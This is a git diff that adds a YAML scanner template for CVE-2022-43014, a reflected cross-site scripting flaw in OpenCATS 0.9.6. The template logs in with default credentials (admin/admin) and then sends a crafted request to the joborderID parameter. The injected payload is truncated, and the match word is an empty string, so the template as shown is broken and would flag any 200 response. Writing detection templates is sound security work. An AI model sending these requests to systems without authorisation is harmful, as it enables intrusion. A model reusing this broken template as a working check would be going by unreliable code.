diff --git a/cves/2022/CVE-2022-43014.yaml b/cves/2022/CVE-2022-43014.yaml new file mode 100644 index 0000000000..31c08e2177 --- /dev/null +++ b/cves/2022/CVE-2022-43014.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-43014 + +info: + name: OpenCATS - Cross Site Scripting + author: arafatansari + severity: medium + description: | + OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43014 + tags: xss,cve,2022 + +requests: + - raw: + - | + POST /index.php?m=login&a=attemptLogin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=admin + + - | + GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - ''